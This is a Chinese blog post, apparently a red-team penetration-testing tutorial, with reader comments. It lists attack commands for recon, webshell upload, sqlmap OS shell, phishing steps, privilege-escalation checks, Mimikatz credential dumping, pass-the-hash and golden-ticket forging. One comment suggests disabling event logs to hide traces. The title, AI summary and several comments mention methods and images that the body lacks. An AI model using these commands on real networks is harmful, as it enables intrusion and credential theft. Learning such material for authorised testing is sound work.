红队实战:初始访问的 5 种方法

爪 爪
爪 爪
爪 爪
编辑
44
文章
0
粉丝
渗透测试22682字数 533阅读1分46秒阅读模式
AI智能摘要
当你终于通过Web漏洞拿到一台内网服务器的权限,却在下一秒陷入了"这是终点还是起点"的迷茫——90%的渗透测试人员都死在这个环节。大多数人以为初始访问只是找个入口,却不知道红队实战中最残酷的筛选从进门那一刻才开始。本文基于真实项目复盘,不讲虚的理论,直接给你5种能撕开企业内网防线的具体打法,从钓鱼话术的致命细节到Mimikatz抓取密码后的横向移动,每一行命令都经过实战验证。但那个能让域控权限稳拿90分钟不被发现的核心技巧,你敢在真实环境中尝试吗?
— AI 生成的文章内容摘要

 

红队实战:初始访问的 5 种方法

摘要:内网渗透是企业安全评估的核心环节。本文基于真实渗透测试项目,系统讲解从信息收集、横向移动到域控拿下的完整流程。

一、渗透测试流程概览

信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写

二、信息收集阶段

2.1 外网信息收集

红队实战:初始访问的 5 种方法

# 子域名枚举
subfinder -d target.com -o subs.txt

# 端口扫描 nmap -sS -sV -p- target.com

# 目录扫描 dirsearch -u http://target.com -e php,html,js

# 指纹识别 whatweb http://target.com

2.2 社工库查询

- 邮箱泄露查询:haveibeenpwned.com
- 密码泄露查询:dehashed.com
- 企业邮箱格式:theHarvester

三、初始访问

3.1 Web 漏洞利用

# 文件上传漏洞
# 上传 webshell 到 /uploads/shell.php

# SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell

# RCE 漏洞 # Struts2、WebLogic、Fastjson 等

3.2 钓鱼攻击

1. 伪造登录页面
2. 发送钓鱼邮件
3. 获取员工凭证
4. VPN 登录内网

四、权限提升

4.1 Windows 提权

# 检查系统信息
systeminfo
whoami /priv

# 检查补丁 wmic qfe list

# 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula

4.2 linux 提权

# 检查内核版本
uname -a

# 检查 sudo 权限 sudo -l

# 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null

# 检查 cron 任务 cat /etc/crontab

五、横向移动

5.1 凭证窃取

# Mimikatz 抓取密码
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

# 导出 hash mimikatz # lsadump::sam

5.2 传递攻击

# PtH(传递 hash)
mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH

# PtT(传递票据) mimikatz # kerberos::ptt admin.ccache

六、域控拿下

6.1 域信息收集

# 查看域信息
net domain
nltest /domain_trusts

# 查看域控 nltest /dclist:target.com

# 查看域用户 net user /domain

6.2 黄金票据

# 获取 krbtgt hash
mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt

# 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx

七、报告编写

7.1 报告结构

1. 执行摘要
2. 漏洞列表(按风险等级)
3. 详细利用过程
4. 修复建议
5. 附录(工具、命令)

---
作者:爪
分类:渗透测试
标签:内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间:2026-04-07

 
爪 爪
  • 本文由 爪 爪 发表于2026年4月8日 13:26:33
  • crontab
  • it2021
  • it2021.com
  • nmap
  • shell
  • test
  • Web 漏洞利用
  • 信息收集
  • 子域名枚举
  • 渗透测试
  • 漏洞利用
  • 漏洞扫描
  • 红队实战
评论  22  访客  22
    • 勃兰登堡门
      勃兰登堡门 0

      求问文件上传那个webshell,一般传啥后缀最容易过?

      • 云端的猫
        云端的猫 1

        之前搞红队培训,光钓鱼邮件就练了半个月,社工真比技术难

        • 荒漠猎手
          荒漠猎手 1

          mimikatz现在还能用?不是说大部分EDR都拦了吗?

          • 光影未来
            光影未来 1

            这操作太野了,物理接入直接破防😂

            • 迷茫的烟
              迷茫的烟 0

              要是目标禁用了U盘启动,这种物理接触还有戏吗?

              • 望月人
                望月人 1

                感觉还是得结合具体的EDR绕过技巧,不然上去就被干掉了。

                • 星野灯里
                  星野灯里 1

                  这物理接入看着是简单,真去现场还得找理由混进去吧?

                  • 翡翠青鸾
                    翡翠青鸾 1

                    文章里那个nmap全端口扫描,实战里跑完不得大半天?太慢了。

                    • 樱雪
                      樱雪 1

                      这种操作确实得练,光看文档根本学不会。

                      • 鲁路修·兰佩路基
                        鲁路修·兰佩路基 0

                        感觉还行

                        • EchoesOfDusk
                          EchoesOfDusk 1

                          那个戴手套的人是不是演的太刻意了,哪有攻击者穿这么整齐的

                          • 星砚
                            星砚 1

                            我试过用dehashed查公司邮箱,结果全是无效账号,白忙活

                            • 禺疆
                              禺疆 1

                              sudo -l看了半天发现没权限,瞬间心凉半截

                                • 浆果跳跳
                                  浆果跳跳 0

                                  @ 禺疆 确实,有时候提权卡在那真想砸键盘。

                                • 赛博术士
                                  赛博术士 0

                                  黄金票据生成那步总失败,是不是域时间不同步导致的?

                                  • 忧郁的南瓜
                                    忧郁的南瓜 1

                                    mimikatz 现在还能用?不是说大部分EDR都拦了吗?

                                    • 逻辑之眼
                                      逻辑之眼 1

                                      subfinder跑出来的子域名太多,根本筛不过来啊

                                      • 云想衣
                                        云想衣 1

                                        Fastjson那个漏洞现在打点企业还顺手不?

                                        • 嘚瑟鸡
                                          嘚瑟鸡 0

                                          看着挺吓人,实际做的时候最怕被网安抓现行

                                          • 醉卧兰亭
                                            醉卧兰亭 1

                                            域控拿下后第一步该干嘛?怕留痕迹被反查

                                              • 魔棺夜谈
                                                魔棺夜谈 0

                                                @ 醉卧兰亭 这时候就看日志清除做得细不细了,一般先把事件日志停了再说。

                                              • 影舞者
                                                影舞者 1

                                                这图拍得跟电影似的,真实场景哪有这么亮👀

                                              匿名

                                              发表评论

                                              匿名网友

                                              拖动滑块以完成验证